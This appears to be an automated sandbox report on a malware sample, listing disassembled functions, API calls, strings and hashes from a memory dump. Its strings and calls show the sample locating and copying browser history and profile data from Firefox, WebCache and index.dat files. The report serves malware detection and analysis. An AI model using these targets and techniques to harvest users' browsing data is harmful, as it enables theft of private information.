                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                    • API String ID: 3510742995-2641926074
                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 004033B7
                    • memcpy.MSVCRT ref: 004033D0
                    • wcscmp.MSVCRT ref: 004033FC
                    • _wcsicmp.MSVCRT ref: 00403439
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                    • String ID: $0.@
                    • API String ID: 3030842498-1896041820
                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 2941347001-0
                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                    APIs
                    • memset.MSVCRT ref: 00403C09
                    • memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                    • wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • wcscat.MSVCRT ref: 00403C70
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscat$Closewcscpywcslen
                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                    • API String ID: 3249829328-1174173950
                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                    APIs
                    • memset.MSVCRT ref: 0040A824
                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • wcscpy.MSVCRT ref: 0040A854
                    • wcscat.MSVCRT ref: 0040A86A
                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 669240632-0
                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                    APIs
                    • wcschr.MSVCRT ref: 00414458
                    • _snwprintf.MSVCRT ref: 0041447D
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                    • String ID: "%s"
                    • API String ID: 1343145685-3297466227
                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProcessTimes
                    • String ID: GetProcessTimes$kernel32.dll
                    • API String ID: 1714573020-3385500049
                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                    APIs
                    • memset.MSVCRT ref: 004087D6
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                    • memset.MSVCRT ref: 00408828
                    • memset.MSVCRT ref: 00408840
                    • memset.MSVCRT ref: 00408858
                    • memset.MSVCRT ref: 00408870
                    • memset.MSVCRT ref: 00408888
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                    • String ID:
                    • API String ID: 2911713577-0
                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp
                    • String ID: @ $SQLite format 3
                    • API String ID: 1475443563-3708268960
                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                    APIs
                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    • memset.MSVCRT ref: 00414C87
                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseProcVersionmemsetwcscpy
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 2705122986-2036018995
                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 1579243037-1578091866
                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                    APIs
                    • memset.MSVCRT ref: 0040E60F
                    • memset.MSVCRT ref: 0040E629
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                    • API String ID: 3354267031-2114579845
                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                    APIs
                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                    • LockResource.KERNEL32(00000000), ref: 004148EF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                    APIs
                    Strings
                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: only a single result allowed for a SELECT that is part of an expression
                    • API String ID: 2221118986-1725073988
                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 004175D0
                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotificationSleep
                    • String ID: }A
                    • API String ID: 1821831730-2138825249
                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DeleteObject
                    • String ID: r!A
                    • API String ID: 1103273653-628097481
                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                    APIs
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    • memcmp.MSVCRT ref: 00444BA5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$memcmp
                    • String ID: $$8
                    • API String ID: 2808797137-435121686
                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                    APIs
                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                    • String ID:
                    • API String ID: 1042154641-0
                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                    APIs
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                    • memset.MSVCRT ref: 00403A55
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                    • String ID: history.dat$places.sqlite
                    • API String ID: 3093078384-467022611
                    • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                    • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                    APIs
                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                    • GetLastError.KERNEL32 ref: 00417627
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$File$PointerRead
                    • String ID:
                    • API String ID: 839530781-0
                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: *.*$index.dat
                    • API String ID: 1974802433-2863569691
                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
